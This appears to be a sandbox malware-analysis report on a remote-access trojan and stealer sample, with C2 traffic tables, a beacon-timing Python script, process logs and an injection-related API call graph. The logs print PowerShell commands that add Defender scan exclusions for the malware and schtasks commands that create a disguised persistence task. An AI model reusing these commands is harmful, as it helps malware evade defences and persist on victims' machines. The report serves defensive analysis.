                      Jul 18, 2024 16:31:51.064928055 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:51.067688942 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:51.072901964 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:04.204452991 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:04.261724949 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:32:04.570806980 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:32:04.575828075 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:04.783942938 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:04.785702944 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:32:04.790569067 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:06.994038105 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:32:06.999061108 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:07.008755922 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:32:07.014265060 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:07.102291107 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:32:07.108501911 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:07.204334021 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:07.206417084 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:32:07.211281061 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:07.332920074 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:07.334605932 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:32:07.339598894 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:07.451644897 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:07.453531027 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:32:07.458456993 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:15.540010929 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:32:15.545300961 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:16.033703089 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:16.036921024 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:16.037200928 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:32:16.039118052 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:32:16.044476986 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:17.445759058 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:32:17.478152990 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:17.478214025 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:32:17.488514900 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:17.672245979 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:17.674007893 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:32:17.678848028 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:17.876040936 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:17.877995968 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:32:17.882847071 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:23.992654085 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:32:24.013540983 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:24.237898111 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:24.240509987 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:32:24.245366096 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:28.852276087 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:32:28.857325077 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:29.089566946 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:29.091684103 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:32:29.096566916 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:34.193804979 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:34.243185043 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:32:42.589699030 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:32:42.595805883 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:42.894130945 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:42.896224022 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:32:42.901123047 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:56.321254969 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:32:56.326977015 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:56.492829084 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:32:56.616192102 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:56.624037981 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:56.624092102 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:32:56.629151106 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:56.830532074 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:56.832349062 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:32:56.839005947 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:33:04.227003098 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:33:04.232907057 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:33:04.535226107 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:33:04.539840937 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:33:04.544970036 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:33:09.713680029 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:33:09.718672037 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:33:09.947715998 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:33:09.953691006 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:33:09.958503008 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:33:12.414556026 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:33:12.419718027 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:33:12.636915922 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:33:12.637856960 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:33:12.643827915 CEST3060849717193.161.193.99192.168.2.6
                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                      Jul 18, 2024 16:29:13.448894024 CEST | 50969 | 53 | 192.168.2.6 | 1.1.1.1
                      Jul 18, 2024 16:29:13.481210947 CEST | 53 | 50969 | 1.1.1.1 | 192.168.2.6
                      Jul 18, 2024 16:29:48.048352003 CEST | 53 | 62695 | 162.159.36.2 | 192.168.2.6
                      Jul 18, 2024 16:29:48.539948940 CEST | 53 | 59289 | 1.1.1.1 | 192.168.2.6
                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                      Jul 18, 2024 16:29:13.448894024 CEST | 192.168.2.6 | 1.1.1.1 | 0xc826 | Standard query (0) | moneymaker-30608.portmap.host | A (IP address) | IN (0x0001) | false
                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                      Jul 18, 2024 16:29:13.481210947 CEST | 1.1.1.1 | 192.168.2.6 | 0xc826 | No error (0) | moneymaker-30608.portmap.host | - | 193.161.193.99 | A (IP address) | IN (0x0001) | false
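
The tables above record one DNS lookup (moneymaker-30608.portmap.host -> 193.161.193.99) followed by a long-lived TCP session 192.168.2.6:49717 <-> 193.161.193.99:30608. The script below is an added example, not part of the Joe Sandbox report: it parses rows in the report's column order, confirms that the TCP peer is the address the DNS answer returned, and estimates the session's keep-alive cadence from the inter-packet gaps. The embedded rows are a subset copied from the tables above (constructed input so the script runs offline); the periodicity estimator is the author's own and not something the report computes.

```python
"""Added example, not part of the Joe Sandbox report: summarise the C2 session
in the report's network tables and measure its keep-alive cadence.

PACKET_ROWS and DNS_ANSWER_ROW are a subset of the report's TCP and DNS answer
rows (constructed input, embedded so the script runs offline); column order
follows the report's tables.
"""
import ipaddress
from collections import Counter, namedtuple
from datetime import datetime

Packet = namedtuple("Packet", "ts src_ip src_port dst_ip dst_port")

# Timestamp | Source Port | Dest Port | Source IP | Dest IP
# Five server-to-client packets that open an exchange (~30 s apart), the
# client's replies, and three client-initiated exchanges in between.
PACKET_ROWS = """\
Jul 18, 2024 16:30:34.982320070 CEST | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
Jul 18, 2024 16:30:34.983603954 CEST | 49717 | 30608 | 192.168.2.6 | 193.161.193.99
Jul 18, 2024 16:30:50.414748907 CEST | 49717 | 30608 | 192.168.2.6 | 193.161.193.99
Jul 18, 2024 16:30:50.419939041 CEST | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
Jul 18, 2024 16:31:02.494404078 CEST | 49717 | 30608 | 192.168.2.6 | 193.161.193.99
Jul 18, 2024 16:31:02.500613928 CEST | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
Jul 18, 2024 16:31:04.217555046 CEST | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
Jul 18, 2024 16:31:04.258137941 CEST | 49717 | 30608 | 192.168.2.6 | 193.161.193.99
Jul 18, 2024 16:31:12.995951891 CEST | 49717 | 30608 | 192.168.2.6 | 193.161.193.99
Jul 18, 2024 16:31:13.009941101 CEST | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
Jul 18, 2024 16:31:34.272398949 CEST | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
Jul 18, 2024 16:31:34.320586920 CEST | 49717 | 30608 | 192.168.2.6 | 193.161.193.99
Jul 18, 2024 16:32:04.204452991 CEST | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
Jul 18, 2024 16:32:04.261724949 CEST | 49717 | 30608 | 192.168.2.6 | 193.161.193.99
Jul 18, 2024 16:32:34.193804979 CEST | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
Jul 18, 2024 16:32:34.243185043 CEST | 49717 | 30608 | 192.168.2.6 | 193.161.193.99
"""

# Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DoH
DNS_ANSWER_ROW = ("Jul 18, 2024 16:29:13.481210947 CEST | 1.1.1.1 | 192.168.2.6 | 0xc826 | "
                  "No error (0) | moneymaker-30608.portmap.host | - | 193.161.193.99 | "
                  "A (IP address) | IN (0x0001) | false")


def parse_ts(text):
    """'Jul 18, 2024 16:30:34.982320070 CEST' -> seconds since 1970 (zone ignored,
    every row shares it). The report carries nanoseconds but strptime's %f takes
    at most six digits, so the fraction is truncated to microseconds."""
    stamp, _zone = text.rsplit(" ", 1)
    head, frac = stamp.split(".")
    dt = datetime.strptime(f"{head}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")
    return (dt - datetime(1970, 1, 1)).total_seconds()


def parse_packets(rows):
    packets = []
    for line in rows.strip().splitlines():
        ts, sport, dport, sip, dip = [f.strip() for f in line.split("|")]
        packets.append(Packet(parse_ts(ts), sip, int(sport), dip, int(dport)))
    return packets


def parse_dns_answer(row):
    fields = [f.strip() for f in row.split("|")]
    return fields[5], fields[7]          # (queried name, answered address)


def split_directions(packets):
    """Outbound = private source to public destination (sandbox -> C2)."""
    out, inb = [], []
    for p in packets:
        (out if ipaddress.ip_address(p.src_ip).is_private else inb).append(p)
    return out, inb


def dominant_period(times, lo=5.0, hi=120.0):
    """Most common pairwise forward gap within [lo, hi], rounded to whole
    seconds. Returns (period_s, supporting_pairs), or (None, 0) if no gap
    recurs. Request/response pairs fall under `lo` and are ignored."""
    times = sorted(times)
    gaps = Counter()
    for i, a in enumerate(times):
        for b in times[i + 1:]:
            if lo <= b - a <= hi:
                gaps[round(b - a)] += 1
    if not gaps:
        return None, 0
    period, support = gaps.most_common(1)[0]
    return (period, support) if support >= 2 else (None, 0)


def summarise(rows=PACKET_ROWS, dns_row=DNS_ANSWER_ROW):
    packets = parse_packets(rows)
    out, inb = split_directions(packets)
    name, addr = parse_dns_answer(dns_row)
    peer = out[0].dst_ip
    return {
        "c2_name": name,
        "c2_peer": f"{peer}:{out[0].dst_port}",
        "dns_matches_peer": addr == peer,
        "packets_out": len(out),
        "packets_in": len(inb),
        "duration_s": round(packets[-1].ts - packets[0].ts, 3),
        "server_period_s": dominant_period([p.ts for p in inb])[0],
        "client_period_s": dominant_period([p.ts for p in out])[0],
    }


if __name__ == "__main__":
    for key, value in summarise().items():
        print(f"{key:>17}: {value}")
```

On the rows above the estimator reports a 30 s period in both directions: in the full table the server sends an unsolicited packet at 16:31:04, 16:31:34, 16:32:04 and 16:32:34 and the client answers within about 50 ms each time, while the client-initiated exchanges in between are irregular. Rounding gaps to whole seconds is deliberately crude; for a beacon with randomised jitter you would bin with a tolerance band instead, and a capture of a few minutes only supports a rough estimate.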

                      Target ID:0
                      Start time:10:29:02
                      Start date:18/07/2024
                      Path:C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe"
                      Imagebase:0x1c0000
                      File size:641'536 bytes
                      MD5 hash:DC674885E842E9C05644CE23F5D8B665
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2209442377.0000000007060000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2200717075.0000000002551000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2200717075.0000000002551000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2200717075.0000000002551000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                      Reputation:low
                      Has exited:true

                      Target ID:3
                      Start time:10:29:06
                      Start date:18/07/2024
                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe"
                      Imagebase:0x160000
                      File size:433'152 bytes
                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:4
                      Start time:10:29:06
                      Start date:18/07/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff66e660000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:5
                      Start time:10:29:06
                      Start date:18/07/2024
                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe"
                      Imagebase:0x160000
                      File size:433'152 bytes
                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:6
                      Start time:10:29:06
                      Start date:18/07/2024
                      Path:C:\Windows\SysWOW64\schtasks.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xNgpESfQOvfb" /XML "C:\Users\user\AppData\Local\Temp\tmpA395.tmp"
                      Imagebase:0x850000
                      File size:187'904 bytes
                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:7
                      Start time:10:29:06
                      Start date:18/07/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff66e660000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:8
                      Start time:10:29:06
                      Start date:18/07/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff66e660000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:9
                      Start time:10:29:07
                      Start date:18/07/2024
                      Path:C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe"
                      Imagebase:0xbc0000
                      File size:641'536 bytes
                      MD5 hash:DC674885E842E9C05644CE23F5D8B665
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000009.00000002.4633950904.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:false

                      Target ID:10
                      Start time:10:29:08
                      Start date:18/07/2024
                      Path:C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe
                      Imagebase:0x820000
                      File size:641'536 bytes
                      MD5 hash:DC674885E842E9C05644CE23F5D8B665
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000A.00000002.2263227779.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000A.00000002.2263227779.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000A.00000002.2263227779.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                      Antivirus matches:
                      • Detection: 100%, Joe Sandbox ML
                      • Detection: 32%, ReversingLabs
                      Reputation:low
                      Has exited:true

                      Target ID:11
                      Start time:10:29:09
                      Start date:18/07/2024
                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Imagebase:0x7ff717f30000
                      File size:496'640 bytes
                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                      Has elevated privileges:true
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:12
                      Start time:10:29:13
                      Start date:18/07/2024
                      Path:C:\Windows\SysWOW64\schtasks.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xNgpESfQOvfb" /XML "C:\Users\user\AppData\Local\Temp\tmp9832.tmp"
                      Imagebase:0x850000
                      File size:187'904 bytes
                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:13
                      Start time:10:29:13
                      Start date:18/07/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff66e660000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:14
                      Start time:10:29:13
                      Start date:18/07/2024
                      Path:C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe"
                      Imagebase:0x280000
                      File size:641'536 bytes
                      MD5 hash:DC674885E842E9C05644CE23F5D8B665
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      Target ID:15
                      Start time:10:29:13
                      Start date:18/07/2024
                      Path:C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe"
                      Imagebase:0xc10000
                      File size:641'536 bytes
                      MD5 hash:DC674885E842E9C05644CE23F5D8B665
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000F.00000002.2297610217.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000F.00000002.2297610217.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                      Reputation:low
                      Has exited:true

                        Execution Graph

                        Execution Coverage:11.7%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0%
                        Total number of Nodes:281
                        Total number of Limit Nodes:17
                        execution_graph 47333 56a7f88 47334 56a7fbf 47333->47334 47335 56a7a48 2 API calls 47334->47335 47336 56a7fc4 47334->47336 47335->47334 47019 56a8169 47020 56a8173 47019->47020 47023 56a7a48 47020->47023 47022 56a81b8 47024 56a7a53 47023->47024 47025 56ab343 47024->47025 47028 ad749c 47024->47028 47033 ad8d69 47024->47033 47025->47022 47030 ad74a7 47028->47030 47029 ad9069 47029->47025 47030->47029 47038 add3a8 47030->47038 47043 add3b8 47030->47043 47035 ad8d78 47033->47035 47034 ad9069 47034->47025 47035->47034 47036 add3a8 2 API calls 47035->47036 47037 add3b8 2 API calls 47035->47037 47036->47034 47037->47034 47040 add3d9 47038->47040 47039 add3fd 47039->47029 47040->47039 47048 add568 47040->47048 47052 add558 47040->47052 47044 add3d9 47043->47044 47045 add3fd 47044->47045 47046 add568 2 API calls 47044->47046 47047 add558 2 API calls 47044->47047 47045->47029 47046->47045 47047->47045 47049 add575 47048->47049 47050 add5af 47049->47050 47056 adc130 47049->47056 47050->47039 47053 add575 47052->47053 47054 add5af 47053->47054 47055 adc130 2 API calls 47053->47055 47054->47039 47055->47054 47057 adc13b 47056->47057 47058 ade2c8 47057->47058 47060 add754 47057->47060 47061 add75f 47060->47061 47062 ad749c 2 API calls 47061->47062 47063 ade337 47062->47063 47067 56a01a0 47063->47067 47072 56a01b8 47063->47072 47064 ade371 47064->47058 47068 56a01b8 47067->47068 47069 56a01f5 47068->47069 47077 56a0fff 47068->47077 47082 56a1010 47068->47082 47069->47064 47073 56a01f5 47072->47073 47074 56a01e9 47072->47074 47073->47064 47074->47073 47075 56a0fff 2 API calls 47074->47075 47076 56a1010 2 API calls 47074->47076 47075->47073 47076->47073 47078 56a103b 47077->47078 47079 56a10ea 47078->47079 47087 56a1ee0 47078->47087 47091 56a1ed0 47078->47091 47083 56a103b 47082->47083 47084 56a10ea 47083->47084 47085 56a1ee0 2 API calls 47083->47085 47086 56a1ed0 2 API calls 47083->47086 47085->47084 47086->47084 47095 56a1f30 47087->47095 47099 56a1f24 
47087->47099 47092 56a1f15 47091->47092 47093 56a1f30 CreateWindowExW 47091->47093 47094 56a1f24 CreateWindowExW 47091->47094 47092->47079 47093->47092 47094->47092 47096 56a1f98 CreateWindowExW 47095->47096 47098 56a2054 47096->47098 47100 56a1f98 CreateWindowExW 47099->47100 47102 56a2054 47100->47102 47152 71d69d9 47153 71d68f4 47152->47153 47157 71d8e90 47153->47157 47172 71d8e82 47153->47172 47154 71d6806 47158 71d8eaa 47157->47158 47188 71d9466 47158->47188 47193 71d94d6 47158->47193 47198 71d9957 47158->47198 47202 71d9317 47158->47202 47207 71d9565 47158->47207 47213 71d972a 47158->47213 47220 71d92ea 47158->47220 47225 71d925a 47158->47225 47233 71d99cc 47158->47233 47243 71d9a12 47158->47243 47248 71d9392 47158->47248 47252 71d9350 47158->47252 47159 71d8eb2 47159->47154 47173 71d8e5a 47172->47173 47174 71d8e8a 47172->47174 47173->47154 47176 71d99cc 4 API calls 47174->47176 47177 71d925a 4 API calls 47174->47177 47178 71d92ea 2 API calls 47174->47178 47179 71d972a 2 API calls 47174->47179 47180 71d9565 2 API calls 47174->47180 47181 71d9317 2 API calls 47174->47181 47182 71d9957 2 API calls 47174->47182 47183 71d94d6 2 API calls 47174->47183 47184 71d9466 2 API calls 47174->47184 47185 71d9350 2 API calls 47174->47185 47186 71d9392 2 API calls 47174->47186 47187 71d9a12 2 API calls 47174->47187 47175 71d8eb2 47175->47154 47176->47175 47177->47175 47178->47175 47179->47175 47180->47175 47181->47175 47182->47175 47183->47175 47184->47175 47185->47175 47186->47175 47187->47175 47189 71d9b40 47188->47189 47256 71d5df9 47189->47256 47261 71d5e00 47189->47261 47190 71d9b5b 47194 71d94ee 47193->47194 47265 71d5f98 47194->47265 47269 71d5f90 47194->47269 47195 71d950f 47195->47159 47200 71d5f98 WriteProcessMemory 47198->47200 47201 71d5f90 WriteProcessMemory 47198->47201 47199 71d9985 47200->47199 47201->47199 47203 71d92f6 47202->47203 47203->47202 47204 71d9308 47203->47204 47205 71d5f98 WriteProcessMemory 47203->47205 47206 71d5f90 WriteProcessMemory 
47203->47206 47204->47159 47205->47203 47206->47203 47208 71d94ee 47207->47208 47209 71d9c50 47208->47209 47211 71d5f98 WriteProcessMemory 47208->47211 47212 71d5f90 WriteProcessMemory 47208->47212 47210 71d950f 47210->47159 47211->47210 47212->47210 47214 71d9844 47213->47214 47273 71d9eff 47214->47273 47279 71d9f52 47214->47279 47285 71d9ec0 47214->47285 47296 71d9f10 47214->47296 47215 71d9860 47222 71d92f6 47220->47222 47221 71d9308 47221->47159 47222->47221 47223 71d5f98 WriteProcessMemory 47222->47223 47224 71d5f90 WriteProcessMemory 47222->47224 47223->47222 47224->47222 47226 71d9298 47225->47226 47309 71d6214 47226->47309 47313 71d6220 47226->47313 47234 71d9a29 47233->47234 47235 71d99d5 47233->47235 47317 71d5918 47234->47317 47321 71d5910 47234->47321 47235->47234 47238 71d92f6 47235->47238 47236 71d9a3e 47237 71d9308 47237->47159 47238->47237 47239 71d5f98 WriteProcessMemory 47238->47239 47240 71d5f90 WriteProcessMemory 47238->47240 47239->47238 47240->47238 47244 71d9a18 47243->47244 47246 71d5918 ResumeThread 47244->47246 47247 71d5910 ResumeThread 47244->47247 47245 71d9a3e 47246->47245 47247->47245 47250 71d5df9 Wow64SetThreadContext 47248->47250 47251 71d5e00 Wow64SetThreadContext 47248->47251 47249 71d93ac 47250->47249 47251->47249 47325 71d6088 47252->47325 47329 71d6080 47252->47329 47253 71d9372 47253->47159 47257 71d5dfe Wow64SetThreadContext 47256->47257 47258 71d5dd4 47256->47258 47260 71d5e8d 47257->47260 47258->47190 47260->47190 47262 71d5e45 Wow64SetThreadContext 47261->47262 47264 71d5e8d 47262->47264 47264->47190 47266 71d5fe0 WriteProcessMemory 47265->47266 47268 71d6037 47266->47268 47268->47195 47270 71d5f98 WriteProcessMemory 47269->47270 47272 71d6037 47270->47272 47272->47195 47274 71d9ee6 47273->47274 47275 71d9f0a 47273->47275 47274->47215 47301 71d5ed8 47275->47301 47305 71d5ed1 47275->47305 47276 71d9f44 47276->47215 47280 71d9f36 47279->47280 47282 71d9f5a 47279->47282 47283 71d5ed8 VirtualAllocEx 47280->47283 47284 71d5ed1 
